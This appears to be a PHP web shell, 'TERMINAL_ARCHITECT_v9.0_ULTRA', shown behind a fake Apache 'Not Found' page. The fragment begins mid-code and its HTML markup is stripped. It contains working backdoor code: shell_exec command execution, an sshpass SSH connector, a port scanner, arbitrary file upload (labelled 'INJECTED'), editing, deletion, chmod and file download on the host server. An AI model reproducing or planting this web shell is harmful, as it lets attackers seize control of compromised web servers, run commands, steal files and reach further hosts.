Not Found

The requested URL was not found on this server.


Apache Server at Port 80
&1"); } else { $ssh_out = "ERROR: 'sshpass' tidak terinstall di server ini."; } } // --- PORT SCANNER LOGIC --- $scan_res = ""; if (isset($_POST['scan_port'])) { $target = $_POST['scan_ip']; $ports = explode(',', $_POST['scan_ports']); foreach ($ports as $port) { $fp = @fsockopen($target, trim($port), $errno, $errstr, 1); if ($fp) { $scan_res .= "[+] Port $port : OPEN\n"; fclose($fp); } else { $scan_res .= "[-] Port $port : CLOSED\n"; } } } // --- FILE OPS LOGIC --- function ex($c) { return shell_exec($c . " 2>&1"); } if (isset($_POST['nf'])) { $content = isset($_POST['f_content']) ? $_POST['f_content'] : ""; file_put_contents($_POST['n'], $content); $msg = "FILE CREATED"; } if (isset($_POST['nd'])) { mkdir($_POST['n']); $msg = "DIR CREATED"; } if (isset($_GET['del'])) { $t = $_GET['del']; is_dir($t) ? ex("rm -rf ".escapeshellarg($t)) : unlink($t); $msg = "DELETED"; } if (isset($_POST['save_f'])) { file_put_contents($_POST['fn'], $_POST['c']); $msg = "FILE SAVED"; } if (isset($_POST['chm'])) { chmod($_POST['tp'], octdec($_POST['cv'])); $msg = "CHMOD UPDATED"; } if (isset($_POST['rename_go'])) { rename($_POST['old_n'], $_POST['new_n']); $msg = "RENAMED"; } if (isset($_FILES['u'])) { move_uploaded_file($_FILES['u']['tmp_name'], $cwd.'/'.$_FILES['u']['name']); $msg = "INJECTED"; } if (isset($_GET['dl'])) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($_GET['dl']).'"'); readfile($_GET['dl']); exit; } // Helper Format Size function formatSize($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { $bytes = $bytes . ' bytes'; } elseif ($bytes == 1) { $bytes = $bytes . ' byte'; } else { $bytes = '0 bytes'; } return $bytes; } $sort = isset($_GET['sort']) ? $_GET['sort'] : 'name'; $order = isset($_GET['order']) ? $_GET['order'] : 'asc'; ?> TERMINAL_ARCHITECT_v9.0_ULTRA
USER: | SERVER: [ TERMINATE_SESSION ]
[!] $msg"; ?>
# RENAME_OBJECT



CANCEL
# SOURCE_EDITOR:

[ CLOSE_EDITOR ]
# SQL_EXPLORER
# PORT_SCANNER




# TERMINAL
# SSH_CONNECTOR
# INJECTOR & CREATOR



# FILE_SYSTEM

📂 [ PARENT_DIR ] $i, 'path' => $p, 'size' => is_dir($p) ? -1 : filesize($p), 'date' => filemtime($p), 'is_dir' => is_dir($p) ]; } usort($items_data, function($a, $b) use ($sort, $order) { if ($sort == 'size') $val = $a['size'] - $b['size']; elseif ($sort == 'date') $val = $a['date'] - $b['date']; else $val = strnatcasecmp($a['name'], $b['name']); return ($order == 'asc') ? $val : -$val; }); foreach($items_data as $item) { $i = $item['name']; $p = $item['path']; $perm = substr(sprintf('%o', fileperms($p)), -4); $last_mod = date("Y-m-d H:i", $item['date']); $icon = $item['is_dir'] ? "📁" : "📄"; // Klik Maju logic ada di sini $display_name = $item['is_dir'] ? "$i/" : "$i"; $size_disp = $item['is_dir'] ? "DIR" : formatSize($item['size']); echo ""; } ?>
NAME ⇅ SIZE ⇅ MODIFIED ⇅ MODE ACTIONS
$icon $display_name $size_disp $last_mod $perm EDIT REN DL DEL
# CHMOD_EDIT



CANCEL